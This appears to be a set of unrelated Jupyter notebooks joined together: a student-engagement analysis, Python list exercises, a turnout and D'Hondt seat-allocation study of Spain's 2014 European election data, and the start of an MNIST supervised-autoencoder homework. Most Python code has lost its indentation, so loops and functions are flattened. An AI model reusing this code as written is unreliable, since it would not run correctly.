# To store all the account keys of students which passed the project or got distinction at some point of time.
for submission in paid_submissions:
project = submission['lesson_key']
rating = submission['assigned_rating']
if project in subway_project_lesson_keys and (rating == 'PASSED' or rating == 'DISTINCTION'):
pass_subway_project.add(submission['account_key'])
print("Number of passing student IDs :", len(pass_subway_project))
passing_engagement = []
non_passing_engagement = []
# Now we are specifically looking for 'paid_engagements in one week'.
# We have more engagements than the IDs because engagement_record contain multiple records with same account_key.
for engagement_record in paid_engagement_in_first_week:
if engagement_record['account_key'] in pass_subway_project:
passing_engagement.append(engagement_record)
else:
non_passing_engagement.append(engagement_record)
print("Number of passing engagements :", len(passing_engagement))
print("Number of non-passing engagements :", len(non_passing_engagement))
###Output
Number of passing student IDs : 647
Number of passing engagements : 4528
Number of non-passing engagements : 2392
###Markdown
Comparing the Two Student Groups
###Code
## Compute some metrics you're interested in and see how they differ for
## students who pass the subway project vs. students who don't. A good
## starting point would be the metrics we looked at earlier (minutes spent
## in the classroom, lessons completed, and days visited).
#lessons_completed
#has_visited
passing_engagement_by_account = group_data(passing_engagement, 'account_key')
#passing_engagement_by_account
non_passing_engagement_by_account = group_data(non_passing_engagement, 'account_key')
#non_passing_engagement_by_account
passing_minutes = sum_grouped_items(passing_engagement_by_account, 'total_minutes_visited')
described_data(passing_minutes,'Total Minutes Visited for Passing Engagements:')
non_passing_minutes = sum_grouped_items(non_passing_engagement_by_account, 'total_minutes_visited')
described_data(non_passing_minutes,'Total Minutes Visited for NON - Passing Engagements:')
print('\n')
passing_lessons = sum_grouped_items(passing_engagement_by_account, 'lessons_completed')
described_data(passing_lessons,'Total Lessons Completed for Passing Engagements:')
non_passing_lessons = sum_grouped_items(non_passing_engagement_by_account, 'lessons_completed')
described_data(non_passing_lessons,'Total Lessons Completed for NON - Passing Engagements:')
print('\n')
passing_visits = sum_grouped_items(passing_engagement_by_account, 'has_visited')
described_data(passing_visits,'Total Visits/Day for Passing Engagements:')
non_passing_visits = sum_grouped_items(non_passing_engagement_by_account, 'has_visited')
described_data(non_passing_visits,'Total Visits/Day for NON - Passing Engagements:')
###Output
Total Minutes Visited for Passing Engagements:
Mean: 418.419087644255
Standard deviation: 451.4461628439436
Minimum: 0.0
Maximum: 3564.7332645
Total Minutes Visited for NON - Passing Engagements:
Mean: 153.56031713254023
Standard deviation: 275.7049201529198
Minimum: 0.0
Maximum: 1768.5227493
Total Lessons Completed for Passing Engagements:
Mean: 2.115919629057187
Standard deviation: 3.157950646243919
Minimum: 0
Maximum: 36
Total Lessons Completed for NON - Passing Engagements:
Mean: 0.8994252873563219
Standard deviation: 2.59280607602387
Minimum: 0
Maximum: 27
Total Visits/Day for Passing Engagements:
Mean: 3.608964451313756
Standard deviation: 2.183989800104125
Minimum: 0
Maximum: 7
Total Visits/Day for NON - Passing Engagements:
Mean: 1.9885057471264367
Standard deviation: 1.9088074924073457
Minimum: 0
Maximum: 7
###Markdown
Making Histograms
###Code
## Make histograms of the three metrics we looked at earlier for both
## students who passed the subway project and students who didn't. You
## might also want to make histograms of any other metrics you examined.
%matplotlib inline
import matplotlib.pyplot as plt
def described_data(data, header = '' ): # header is the title we need to give this statistics with default as None
updated_data = list(data.values())
print(header)
print('Mean:', np.mean(updated_data))
print('Standard deviation:', np.std(updated_data))
print('Minimum:', np.min(updated_data))
print('Maximum:', np.max(updated_data))
plt.hist(updated_data)
    plt.show()  # render each figure immediately (otherwise only the last histogram would be shown)
described_data(passing_minutes,'Total Minutes Visited for Passing Engagements:')
described_data(non_passing_minutes,'Total Minutes Visited for NON - Passing Engagements:')
described_data(passing_lessons,'Total Lessons Completed for Passing Engagements:')
described_data(non_passing_lessons,'Total Lessons Completed for NON - Passing Engagements:')
described_data(passing_visits,'Total Visits/Day for Passing Engagements:')
described_data(non_passing_visits,'Total Visits/Day for NON - Passing Engagements:')
###Output
Total Minutes Visited for Passing Engagements:
Mean: 418.419087644255
Standard deviation: 451.4461628439436
Minimum: 0.0
Maximum: 3564.7332645
###Markdown
Improving Plots and Sharing Findings
###Code
## Make a more polished version of at least one of your visualizations
## from earlier. Try importing the seaborn library to make the visualization
## look better, adding axis labels and a title, and changing one or more
## arguments to the hist() function.
import seaborn as sns
plt.hist(non_passing_visits.values(), bins=8)
plt.xlabel('Number of days')
plt.title('Distribution of classroom visits in the first week ' +
'for students who do not pass the subway project')
plt.show()
plt.hist(passing_visits.values(), bins=8)
plt.xlabel('Number of days')
plt.title('Distribution of classroom visits in the first week ' +
'for students who pass the subway project')
plt.show()
###Output
_____no_output_____ |
Criando_uma_Lista_numérica.ipynb | ###Markdown
###Code
for value in range(1,5):
print(value)
for value in range(1,6):
print (value)
numeros = list(range (1,6))
print (numeros)
# in this case the range steps by 2, from 2 up to (but not including) 11
numero = list(range(2,11,2))
print(numero)
# in this case a list is created by looping over the numbers 1 to 10 and squaring each one
quadrado = []
for value in range (1,11):
quadrad = value**2
quadrado.append(quadrad)
print(quadrado)
digit = [1,2,3,4,5,6,7,8,9,0]
min(digit)
max(digit)
sum(digit)
# LIST COMPREHENSIONS
numero=[value**2 for value in range(1,11)]
print(numero)
numero2= [value*2 for value in range(1,11)]
numero3= [value*3 for value in range(1,11)]
numero4= [value*4 for value in range(1,11)]
numero5= [value*5 for value in range(1,11)]
print(numero2)
print(numero3)
print(numero4)
print(numero5)
mil = list(range(1,1000))
print(mil)
min(mil)
max(mil)
sum(mil)
###Output
_____no_output_____ |
Elecciones Europeas.ipynb | ###Markdown
Strategy

Calculate which places vote less than average. Then of those, figure out which ones, if they increased their participation to the average, would yield a net increase in votes to the designated party. Essentially, which places would grant an extra electoral seat with a non-partisan democratic message of more participation.

Hypothesis

1. The distribution of votes within a region doesn't change as participation rates increase towards the average. I.e. if 30% of the people in that region vote for party X when the participation is 20%, they will still vote 30% for that party when the participation increases to 30%.
2. We use a single electoral college or circumscription, as is the case for Spain and the European elections. I.e. every vote counts the same, and the seats are assigned using the D'Hondt law.

Note: To improve it, one could assume a partisan message, and then assign the effort to increase the % of votes for a particular party using the analogy of saturation points. I.e. look at change of prevalence as a proxy of the effort needed to make that change.

Data

* I use the latest, most granular data available for the Spain 2014 European elections.
* The data is available online at http://elecciones.mir.es/resultados2014/ini99v.htm Note: the results are "provisional" at 99.77% counted, but these are the best ones I could get at the municipal granularity.
* One could modify votes using more recent trends, but for the scope of this exercise, this is enough.

The data is not available in a standard format; rather it is an internal file inside the executable program the government created. One has to fiddle a bit to extract the `.mdb` database of 132 Mb. To extract the data I use the hints given here: https://www.codeenigma.com/community/blog/using-mdbtools-nix-convert-microsoft-access-mysql

```sh
mdb-schema Europeas2014.mdb mysql > schema.sql
mkdir sql
for i in $( mdb-tables Europeas2014.mdb ); do echo $i ; mdb-export -D "%Y-%m-%d %H:%M:%S" -H -I mysql Europeas2014.mdb $i > sql/$i.sql; done
mysql -uroot -ppassword europeas < schema.sql
for i in $( ls sql/ ); do echo $i ; mysql -uroot -ppassword europeas < sql/$i ; done
```
###Code
def init():
%matplotlib inline
global os,pymysql,pd
import os
import pymysql
import pandas as pd
global conn
host = os.getenv('MYSQL_HOST')
port = os.getenv('MYSQL_PORT')
user = os.getenv('MYSQL_USER')
password = os.getenv('MYSQL_PASSWORD')
database = 'europeas'
conn = pymysql.connect(
host=host,
port=int(port),
user=user,
passwd=password,
db=database,
charset='utf8mb4')
init()
#test connection
query="select * from resultados limit 1"
df = pd.read_sql_query(query,conn)
df.to_dict('index')
###Output
_____no_output_____
###Markdown
This means the party names are abstracted into a dictionary. To see e.g. what is the `CANDIDATURA: 0002`
###Code
query="select * from candidaturas where candidatura=0002;"
df = pd.read_sql_query(query,conn)
df.to_dict('index')
###Output
_____no_output_____
###Markdown
Municipal resultsTo see the results at the municipal level, e.g. on my village "Soto del Barco", I first need to find the code for that location
###Code
query="select * from municipios where nombre='Soto del Barco'"
df = pd.read_sql_query(query,conn)
df.to_dict('index')
query="select * from municipios where AUTONOMIA=03 and PROVINCIA=33 and MUNICIPIO=069"
df = pd.read_sql_query(query,conn)
df
###Output
_____no_output_____
###Markdown
So now I can get the results for that place
###Code
query="""select candidatura,votos_act
from resultados
where AUTONOMIA=03 and PROVINCIA=33 and MUNICIPIO=069
and votos_act>0
order by votos_act desc;"""
df = pd.read_sql_query(query,conn)
df.to_dict('index')
###Output
_____no_output_____
###Markdown
Or more readable, joining the results db with the party db:
###Code
query="""select c.sigla,votos_act,PVOTOS_ACT
from resultados as r
join candidaturas as c on r.candidatura=c.candidatura
where AUTONOMIA=03 and PROVINCIA=33 and MUNICIPIO=069
and votos_act>0
order by votos_act desc;"""
df = pd.read_sql_query(query,conn)
df.to_dict('index')
###Output
_____no_output_____
###Markdown
Which I can cross-compare with the official results [online](http://elecciones.mir.es/resultados2014/99PE/DPE0333906999.htm?d=533) and in the executable program. To check that we are on track we can look at the results.

Histogram of % vote, per municipality

The model is based on comparing the participation of a location against the national spread
###Code
#Define some helper functions
import numpy as np
import matplotlib.pyplot as plt
import scipy.stats as stats
import unidecode
import os
def get_todos_votos():
query="""select c.candidatura,c.sigla,r.PVOTOS_ACT,r.VOTOS_ACT,
r.AUTONOMIA,r.PROVINCIA,r.MUNICIPIO,r.DISTRITO
from resultados as r
join candidaturas as c on r.candidatura=c.candidatura
and r.PVOTOS_ACT >0
order by c.sigla asc;"""
todos_votos=pd.read_sql_query(query,conn)
for col in ['sigla']:
todos_votos[col] = todos_votos[col].apply(unidecode.unidecode)
todos_votos[col] = todos_votos[col].apply(lambda x: x.replace("'",""))
return todos_votos
def get_no_votantes():
query="select CENSO_ACT,VOTOS_ACT,PVOTOS_ACT,PVBLAN_ACT,PVNULOS_ACT, "+\
"AUTONOMIA,PROVINCIA,MUNICIPIO,DISTRITO "+\
"from escrutinio as e "+\
"where"+\
" e.CENSO_ACT>0;"
return pd.read_sql_query(query,conn)
def get_taxonomy(sitio):
"""
get AUTONOMIA,PROVINCIA,MUNICIPIO
"""
query="select * from municipios where nombre='"+sitio+"'"
df = pd.read_sql_query(query,conn)
lugar=df.to_dict('index')
#print("lugar",lugar)
#Check if it corresponds in municipios to several items, e.g. tramos
if (len(lugar.keys())>1):
print(lugar)
        raise RuntimeError('More than one place with that name: '+sitio)
else:
lugar=lugar[0]
return lugar
def get_distritos(lugar,verbose=False):
    # Find all the districts in resultados for this AUTONOMIA, PROVINCIA, MUNICIPIO combination
query="select distinct distrito from resultados where "+\
"AUTONOMIA="+lugar['AUTONOMIA']+\
" and PROVINCIA="+lugar['PROVINCIA']+\
" and MUNICIPIO="+lugar['MUNICIPIO']
distritos = pd.read_sql_query(query,conn)
if verbose:
print("distritos",distritos)
if 'distrito' in distritos.columns:
return distritos['distrito'].values
else:
return ["00"]
def get_ganador_lugar(votos_lugar,verbose=False):
"""Dados los resultados de un lugar,
devuelve las siglas del ganador"""
if verbose: print(votos_lugar)
ganador=votos_lugar.loc[votos_lugar['PVOTOS_ACT'].idxmax()]['sigla']
return ganador
def get_escrutinio_lugar(lugar,distrito='00'):
query="select MESAS_ACT,CENSO_ACT,VOTOS_ACT,PVOTOS_ACT,VBLAN_ACT,PVBLAN_ACT,VNULOS_ACT,PVNULOS_ACT "+\
"from escrutinio as e "+\
"where"+\
" e.AUTONOMIA="+lugar['AUTONOMIA']+\
" and e.PROVINCIA="+lugar['PROVINCIA']+\
" and e.DISTRITO="+distrito+\
" and e.MUNICIPIO="+lugar['MUNICIPIO']+\
";"
escrutinio_lugar = pd.read_sql_query(query,conn)
return escrutinio_lugar
def get_name(lugar,verbose=False):
"""
Get the name of a lugar={'AUTONOMIA':00,'PROVINCIA':00,'MUNICIPIO'}
"""
query="select distinct nombre from municipios where "+\
"AUTONOMIA="+lugar['AUTONOMIA']+\
" and PROVINCIA="+lugar['PROVINCIA']+\
" and MUNICIPIO="+lugar['MUNICIPIO']
sitio = pd.read_sql_query(query,conn)
if verbose:
print("sitio: ",sitio)
if len(sitio)==0:
sitio="@A:"+lugar['AUTONOMIA']+"-P:"+lugar['PROVINCIA']+"-M:"+lugar['MUNICIPIO']
else:
sitio = sitio['nombre'].values[0]
sitio=unidecode.unidecode(sitio)
return sitio
def single_plot(k,nbins,title,p_datos_nacional,p_datos_lugar,datos_lugar):
"""
Nice individual plot for a single histogram
"""
t_range = np.linspace(0,100,nbins)
print(title,end=' ',flush=True)
n, bins, patches = plt.hist(p_datos_nacional, nbins, density=True, facecolor='b', alpha=0.75)
plt.axvline(x=p_datos_lugar,linewidth=5,color='r')
#Probability Density Function, with a Gaussian Kernel
bw_values = [None]#,.1,'scott','silverman'] #kernels for the PDF
for i, bw in enumerate(bw_values):
kde = stats.gaussian_kde(p_datos_nacional,bw_method=bw)
plt.plot(t_range,kde(t_range),lw=2, label='bw = '+str(bw))
    # print(np.sum(kde(t_range))) # this value is not 1 because the Gaussian kernel extends to infinity:
    # even for a normalized histogram whose area sums to 1, the summed kernel values come out >1 (or <1 when kernel(x) extends below 0)
minx=min([np.percentile(p_datos_nacional,1),p_datos_lugar])
maxx=max([np.percentile(p_datos_nacional,99),p_datos_lugar])
plt.xlim(minx, maxx)
plt.title(title+" "+str(datos_lugar))
plt.grid(True)
def distrito_spread(sitio,todos,distrito='00',show_plot=False, verbose=False):
"""
Plot matrix for the participation histogram, plus the first 5 winning parties
"""
cols=4 #plot columns
rows=3 #len(votos_lugar)/4 +1
nbins=100 #bins for the histograms
folder='plots/'
if not os.path.exists(folder):
os.makedirs(folder)
fig=plt.figure(figsize=(15,10))
print(sitio+" "+str(distrito))
fig.subplots_adjust(top=1.2)
#get indexer
lugar=get_taxonomy(sitio)
loc=lugar['AUTONOMIA']+"_"+\
lugar['PROVINCIA']+"_"+\
lugar['MUNICIPIO']+"_"+\
distrito
if verbose:
print(loc)
p_todos_no_votos=todos['PVOTOS_ACT']
p_este_no_votos=todos.loc[loc,'PVOTOS_ACT']
este_no_votos=todos.loc[loc,'VOTOS_ACT']
k=1
title=sitio+" "+str(distrito)+'-> Abs.'
plt.subplot(rows,cols,k)
single_plot(k,nbins,title,p_todos_no_votos,p_este_no_votos,este_no_votos)
#each party
#the complex call gets the first cols*rows names of the parties with most % of votes
for party in todos.loc[loc].filter(like='v_').sort_values(ascending=False).index[0:(cols*rows)-1]:
pparty='p_'+party[2:]
vparty=party
if verbose:
print("k, p: ",k,todos.loc[loc,pparty])
partido=party[2:]
p_todos_partido=todos[todos[pparty]>0][pparty]
p_este_partido=todos.loc[loc,pparty]
este_partido=todos.loc[loc,vparty]
k=k+1
plt.subplot(rows,cols,k)
single_plot(k,nbins,partido,p_todos_partido,p_este_partido,este_partido)
plt.savefig(folder+str(sitio)+"-"+str(distrito)+'.png',bbox_inches = 'tight')
if show_plot:
plt.show()
plt.gcf().clear()
todos_votos = get_todos_votos()
todos_votos
no_votantes = get_no_votantes()
no_votantes
#make_loc_key
def make_loc_key(dataframe,distrito='00',key='loc'):
if 'DISTRITO' not in dataframe.keys():
dataframe['DISTRITO']=distrito
dataframe[key]=dataframe['AUTONOMIA']+"_"+\
dataframe['PROVINCIA']+"_"+\
dataframe['MUNICIPIO']+"_"+\
dataframe['DISTRITO']
return dataframe
#todos=todos_votos.merge(no_votantes,on=['AUTONOMIA','PROVINCIA','MUNICIPIO','DISTRITO'],how='outer',suffixes=['_v','_nv'])
no_votantes=make_loc_key(no_votantes)
todos_votos=make_loc_key(todos_votos)
todos_votos
#Use 'loc' as the index
todos=no_votantes
todos.index=todos['loc']
todos_votos.index=todos_votos['loc']
#order of parties, by total votes
partidos=todos_votos[['VOTOS_ACT','sigla']].groupby(['sigla']).sum()\
.sort_values(by='VOTOS_ACT',ascending=False).index
partidos
#We are going to add the votes for each place (rows) for each party (columns), so we initialize the placeholders
# both for total votes, and the % of votes, in that location
for sigla in partidos:
todos["p_"+sigla]=0
todos["v_"+sigla]=0
todos.head(2)
#Fill up the votes, using the loc indexer.
# This takes some time... Probably faster with some SQL magic that escapes me.
i=0
t=len(todos_votos)
for index,row in todos_votos.iterrows():
todos.loc[index,"p_"+row['sigla']]=row['PVOTOS_ACT']
todos.loc[index,"v_"+row['sigla']]=row['VOTOS_ACT']
i+=1
if i%1000==0: print("Filling votes: {:.1f}% ({} of {}) done".format(i/t*100,i,t),end="\r")
print("\r")
print("done")
todos
#Histogram of particpation
todos.hist(column=['PVOTOS_ACT'],figsize=(4,4),bins=100,density=1);
###Output
_____no_output_____
###Markdown
--- Example with my village
###Code
sitio='Soto del Barco'
lugar=get_taxonomy(sitio)
lugar
#Some places have tons of district within the municipality (e.g. Barcelona or Madrid)
get_distritos(lugar)
distrito_spread(sitio,todos,distrito='00',show_plot=True ,verbose=True)
###Output
Soto del Barco 00
03_33_069_00
Soto del Barco 00-> Abs. k, p: 1 34.74
PSOE k, p: 2 25.61
P.P. k, p: 3 12.11
PODEMOS k, p: 4 11.11
IU-IX k, p: 5 5.42
UPyD k, p: 6 2.51
F.A.C. k, p: 7 1.05
Cs k, p: 8 1.05
EB k, p: 9 0.72
PACMA k, p: 10 0.66
VOX k, p: 11 0.52
PARTIDO X
###Markdown
In the image above, each graph uses the same style. In blue is the national histogram, and in orange is a smoothed histogram using a Gaussian kernel (this means that the integral is not 1, but it helps identify the maximum of the histogram). In red is the value corresponding to the particular place of the graph. The top left panel shows the participation rate, then each row (left to right, top to bottom) shows the parties with the most votes. In the title of each graph is the party name and the actual number of votes for that location (not the %, which is the x-axis). On the x-axis, I use the 1 to 99 percentile range to have prettier graphs. The y-axis is auto-scaled to the individual range.
###Code
#DO SOME RANDOM PLACES, just to have bunch of graphs to scroll and get a better sense of the data quickly
#distrito_spread(sitio,distrito,get_votos_lugar(lugar),todos_votos,no_votantes,get_escrutinio_lugar(lugar))
init()
# pick a couple of municipality names at random
nombres=pd.read_sql_query("select distinct nombre from municipios ORDER BY RAND();",conn)[1:3]
for index,row in nombres.iterrows():
sitio=row['nombre'] #e.g. "Valencia"
lugar=get_taxonomy(sitio)
distritos = get_distritos(lugar)
for distrito in distritos:
distrito_spread(sitio,todos,distrito=distrito,show_plot=False,verbose=False);
###Output
San Salvador 00
San Salvador 00-> Abs. P.P. PSOE PODEMOS Cs VOX CCa-PNC MOVIMIENTO RED PARTIDO X LPD AGE BNG Margalef 00
Margalef 00-> Abs. CiU ERC-NECat-EPDD PSC-PSOE ICV-EUiA Cs P.P. IUA IU-IX IUC-LV IUCLM EB
###Markdown
GEOLOCALIZE

In order to map the municipalities, I need an extra database. I have the INE codes of the locations, but not the corresponding latitude and longitude. I get that data, again in some `.mdb` format, from the national service http://centrodedescargas.cnig.es/CentroDescargas/index.jsp

```sh
mdb-schema --namespace geo Nomenclator_Municipios_EntidadesDePoblacion.mdb mysql > schema.sql
mkdir sql
for i in $( mdb-tables Nomenclator_Municipios_EntidadesDePoblacion.mdb ); do echo $i ; mdb-export -D "%Y-%m-%d %H:%M:%S" -H -I mysql -N geo Nomenclator_Municipios_EntidadesDePoblacion.mdb $i > sql/$i.sql; done
mysql -uroot -ppassword europeas < schema.sql
for i in $( ls sql/ ); do echo $i ; mysql -uroot -ppassword europeas < sql/$i ; done
```

I note that our results database specifies two extra location fields, but they are not actually used, having `0` for all cases:

```sh
select distinct COMARCA,TRAMO from resultados;
+---------+-------+
| COMARCA | TRAMO |
+---------+-------+
| 00      | 0     |
+---------+-------+
1 row in set (0.51 sec)
```
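A quick sketch of the join that follows: an INE municipal code is just the two-digit province code followed by the three-digit municipality code, so it can be lined up with the PROVINCIA and MUNICIPIO fields of the results tables (using Soto del Barco, province 33 and municipality 069 as in the queries above, as the example):

```python
# Split an INE municipal code into the province and municipality parts used by the results tables.
inemuni = '33069'          # Soto del Barco: province 33, municipality 069
provincia = inemuni[0:2]   # '33'
municipio = inemuni[2:5]   # '069'
print(provincia, municipio)
```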
###Code
#Merge the location to the results, lat-lon, but also names
init()
def get_lat_lon():
query="select inemuni,nombre,LONGITUD_ETRS89 as lon, LATITUD_ETRS89 as lat "+\
"from geo_ENTIDADES where tipo='Municipio';"
geoplaces = pd.read_sql_query(query,conn)
return geoplaces
#provincia,municipio '02','001'
geoplaces=get_lat_lon()
geoplaces['PROVINCIA']=geoplaces['inemuni'].str.slice(start=0,stop=2)
geoplaces['MUNICIPIO']=geoplaces['inemuni'].str.slice(start=2,stop=5)
todos_geo=pd.merge(todos, geoplaces, how='inner', on=['PROVINCIA', 'MUNICIPIO'])
todos_geo
#computers don't like weird spanish names, sorry
import unidecode
for col in ['nombre']:
todos_geo[col] = todos_geo[col].apply(unidecode.unidecode)
todos_geo
todos_geo['nombred']=todos_geo['nombre']+' '+todos_geo['DISTRITO']
todos_geo
###Output
_____no_output_____
###Markdown
Participation rate

The linchpin is to get the locations with less than the median participation, so let's get it. Also, let's calculate, for each location, the change in participation needed to reach that reference rate, and split the resulting extra votes (positive or negative) according to each location's actual % of votes per party, in a set of new columns: one for the % delta and one for the actual delta of votes.
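As a small made-up example of the delta columns computed in the next cell (the numbers are illustrative, not taken from the dataset):

```python
# Illustrative only: a place with a census of 1000 voters at 30% participation,
# pushed to a 45% target, contributes 150 extra ballots; a party polling 20%
# there is credited with 20% of those, i.e. 30 extra votes.
censo, pvotos, target_p = 1000, 30.0, 45.0
delta_pvotos = target_p - pvotos                  # 15 percentage points
delta_votos = int(censo * delta_pvotos / 100)     # 150 extra ballots
d_party = int(delta_votos * 20.0 / 100)           # 30 of them credited to the party
print(delta_pvotos, delta_votos, d_party)
```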
###Code
pvotos=todos_geo['PVOTOS_ACT'].values
def get_maxp(pvotos,show_plot=False,party=""):
print(".",end="")
if len(pvotos)==1:
return pvotos[0]
kde = stats.gaussian_kde(pvotos,bw_method=None)
nbins=1000
t_range = np.linspace(0,100,nbins)
pdf = kde(t_range)
max_pdf = max(pdf)
max_p=list(pdf).index(max_pdf)*100/nbins
if show_plot:
if party != "":
plt.title(party)
plt.plot(t_range,kde(t_range));
plt.axvline(x=max_p,linewidth=5,color='r');
plt.show();
return max_p
#NOTE HERE: I'm adding a 5% buffer to make the results easier for this test run.
#This means I'm adding 5% more participation, so the threshold is slightly higher than the median.
maxp_novotos=get_maxp(pvotos,show_plot=True,party='no votantes')+5
print(maxp_novotos)
todos_geo["delta_pvotos"]=0
todos_geo["delta_votos"]=0
todos_geo["delta_pvotos"]=maxp_novotos-todos_geo['PVOTOS_ACT']
todos_geo["delta_votos"]=todos_geo['CENSO_ACT']*todos_geo["delta_pvotos"]/100
todos_geo["delta_votos"]=todos_geo["delta_votos"].astype(int)
for party in filter(lambda k: 'p_' in k, todos_geo.columns):
todos_geo["d_"+party[2:]]=todos_geo["delta_votos"]*todos_geo[party]/100.
todos_geo["d_"+party[2:]]=todos_geo["d_"+party[2:]].astype(int)
todos_geo.sort_values('delta_votos',ascending=False)
#Save it all to a nifty `.csv`
todos_geo.to_csv(path_or_buf='./todos_geo-loc-names.csv',index=False)
todos_geo
###Output
_____no_output_____
###Markdown
---

d'Hondt law

According to our [legislation from the JEC](http://www.juntaelectoralcentral.es/cs/jec/loreg/contenido?packedargs=idContenido=546541&letra=S), we assign seats according to the D'Hondt law.

Basically this means iteratively assigning the next seat to the party with the largest current quotient, where each party's quotient is its total votes divided by one plus the number of seats it has already been assigned. There are some edge cases when the quotients are tied, but they do not apply here.

Note: Most systems that apply this rule also impose a minimum threshold of votes. This is not the case for Spain and the European elections (it will be after 2024, with a 3% threshold of the total census).
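A hand-worked check of the rule with made-up numbers (not from the election data): with 3 seats and votes A=100, B=80, C=30, the quotients are A: 100, 50, 33.3; B: 80, 40; C: 30, so the three largest quotients are 100 (A), 80 (B) and 50 (A), and the seats split as A=2, B=1, C=0. The equivalent "largest quotients" formulation fits in a few lines:

```python
# Largest-quotients form of D'Hondt with toy numbers; it should print {'A': 2, 'B': 1}.
votes = {'A': 100, 'B': 80, 'C': 30}
n_seats = 3
quotients = [(v / (s + 1.0), party) for party, v in votes.items() for s in range(n_seats)]
winners = [party for _, party in sorted(quotients, reverse=True)[:n_seats]]
print({party: winners.count(party) for party in votes if party in winners})
```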
###Code
def dhont(nSeats,votes,verbose=False):
"""
nSeats is the number of seats
votes is a dictionary with the key:value {'party':votes}
verbose is an option to print designation info
"""
t_votes=votes.copy()
seats={}
for key in votes: seats[key]=0
while sum(seats.values()) < nSeats:
max_v= max(t_votes.values())
next_seat=list(t_votes.keys())[list(t_votes.values()).index(max_v)]
if next_seat in seats:
seats[next_seat]+=1
else:
seats[next_seat]=1
if verbose:
print("{} Escaño: {}".format(sum(seats.values()),next_seat))
for key in t_votes:
print("\t{:4.4} [{}]:\t {:.1f}".format(key,seats[key],t_votes[key]))
print("\b")
t_votes[next_seat]=votes[next_seat]/(seats[next_seat]+1)
for key in votes:
if seats[key]==0:
del seats[key]
#print(t_votes)
return seats
nSeats = 54
#Test using the exact official votes for the European elections
votes = {'P.P.':4098339,'PSOE':3614232,'IP':1575308,'Podemos':1253837,'UPYD':1022232,'CEU':851971,
'EPDD':630072,"Cs":497146,"LDP":326464,'EP':302266,'VOX':246833}
seats=dhont(nSeats,votes,verbose=False)
seats
###Output
_____no_output_____
###Markdown
Example with my village
###Code
place='Soto del Barco 00'
for a in todos_geo[todos_geo['nombred']==place].columns:
print(a,todos_geo[todos_geo['nombred']==place][a].values)
#print a selection of columns, to explore the data.
partido="PODEMOS"
cols=['PVOTOS_ACT','CENSO_ACT','nombred','delta_pvotos','delta_votos','p_'+partido,'v_'+partido,'d_'+partido]
todos_geo[(todos_geo['PVOTOS_ACT']<maxp_novotos)][cols].sort_values(by='p_'+partido,ascending=False)
"""
Now that all the data is ready, let's select the places with lower participation than the threshold
"""
# 2. Filter the places where participation is below maxp_novotos
potenciales_no = todos_geo[(todos_geo['PVOTOS_ACT']<maxp_novotos)]
print("{} ({:.0f}%) lugares por debajo de la media de {}% de participación, que suman {} votos extra".format(len(potenciales_no),
len(potenciales_no)/len(todos_geo)*100,
maxp_novotos,potenciales_no['delta_votos'].sum()))
partido='PODEMOS'
cols=['PVOTOS_ACT','CENSO_ACT','nombred','delta_pvotos','delta_votos','p_'+partido,'v_'+partido,'d_'+partido]
potenciales_no[cols].sort_values(by='d_'+partido,ascending=False)
"""
This cell uses a bit of a brute-force approach to get quicker results.
Basically it takes a random sample of 100 or 120 places that are below the low-participation threshold,
then it calculates the electoral results adding the extra votes, keeping the % of votes for each location where the
participation is increased. Then it also allocates the seats according to d'Hondt.
It repeats this random sampling 5,000 times for each sample size, keeping the combination of places that yields the most
seats for the selected party.
It also keeps only the places with more than 100 extra votes for our selected party.
"""
def get_escrutinio(places,deltas=None):
escrutinio={}
for party in filter(lambda k: 'v_' in k, places.columns):
if isinstance(deltas, pd.DataFrame):
escrutinio[party[2:]]=places[party].sum()+deltas['d_'+party[2:]].sum()
else:
escrutinio[party[2:]]=places[party].sum()
return escrutinio
partido="PODEMOS"
potenciales_no = todos_geo[(todos_geo['PVOTOS_ACT']<maxp_novotos)]
potenciales_no=potenciales_no[(potenciales_no['d_'+partido]>100)]
print(len(potenciales_no))
nSeats = 54
max_seats=0
max_sample=potenciales_no
baseline=dhont(nSeats,get_escrutinio(todos_geo),verbose=False)[partido]
target=baseline+1
i=0
for n in [100,120]:
for t in range(5000):
i+=1
deltas=potenciales_no.sample(n)
escrutinio=get_escrutinio(todos_geo,deltas=deltas)
seats=dhont(nSeats,escrutinio,verbose=False)
if seats[partido]>max_seats:
max_seats=seats[partido]
max_sample=deltas
print('{} tries. New max {} seats with {} places. Baseline {} \n'.format(i,max_seats,len(deltas),baseline),end='\r')
print("{} tries. {} seats with {} places. Baseline {} ".format(i,max_seats,len(deltas),baseline),end='\r')
print("")
print(seats)
cols=['PVOTOS_ACT','nombred','delta_pvotos','delta_votos','p_'+partido,'v_'+partido,'d_'+partido]
max_sample[cols]
max_sample.to_csv(path_or_buf='./podemos-5-150.csv',index=False)
dhont(nSeats,get_escrutinio(todos_geo),verbose=False)
deltas=todos_geo.sample(1)
deltas['d_PODEMOS']=25000
deltas
print(dhont(nSeats,get_escrutinio(todos_geo),verbose=False))
print(dhont(nSeats+1,get_escrutinio(todos_geo),verbose=False))
dhont(nSeats,get_escrutinio(todos_geo,deltas=deltas),verbose=False)
conn.close()
###Output
_____no_output_____ |
homework/Bonus2/Marco Vlajnic_Bonus2_CS583.ipynb | ###Markdown
Bonus2: Build a Supervised Autoencoder. Name: [Marco Vlajnic] PCA and the standard autoencoder are unsupervised dimensionality reduction methods, and their learned features are not discriminative. If you build a classifier upon the low-dimensional features extracted by PCA or an autoencoder, you will find the classification accuracy very poor.Linear discriminant analysis (LDA) is a traditional supervised dimensionality reduction method for learning low-dimensional features which are highly discriminative. Likewise, can we extend the autoencoder to supervised learning? **You are required to build and train a supervised autoencoder that looks like the following.** You are required to add other layers properly to alleviate overfitting. 0. You will do the following:1. Read and run my code to train a standard dense autoencoder.2. Build and train a supervised autoencoder, visualize the low-dim features and the reconstructions, and evaluate whether the learned low-dim features are discriminative. 3. Convert the .IPYNB file to an .HTML file. * The HTML file must contain the code and the output after execution. 4. Upload this .HTML file to your Google Drive, Dropbox, or Github repo.5. Submit the link to this .HTML file to Canvas. * Example: https://github.com/wangshusen/CS583-2020S/blob/master/homework/Bonus2/Bonus2.html 1. Data preparation 1.1. Load data
###Code
from keras.datasets import mnist
(x_train, y_train), (x_test, y_test) = mnist.load_data()
x_train = x_train.reshape(60000, 28*28).astype('float32') / 255.
x_test = x_test.reshape(10000, 28*28).astype('float32') / 255.
print('Shape of x_train: ' + str(x_train.shape))
print('Shape of x_test: ' + str(x_test.shape))
print('Shape of y_train: ' + str(y_train.shape))
print('Shape of y_test: ' + str(y_test.shape))
###Output
Shape of x_train: (60000, 784)
Shape of x_test: (10000, 784)
Shape of y_train: (60000,)
Shape of y_test: (10000,)
###Markdown
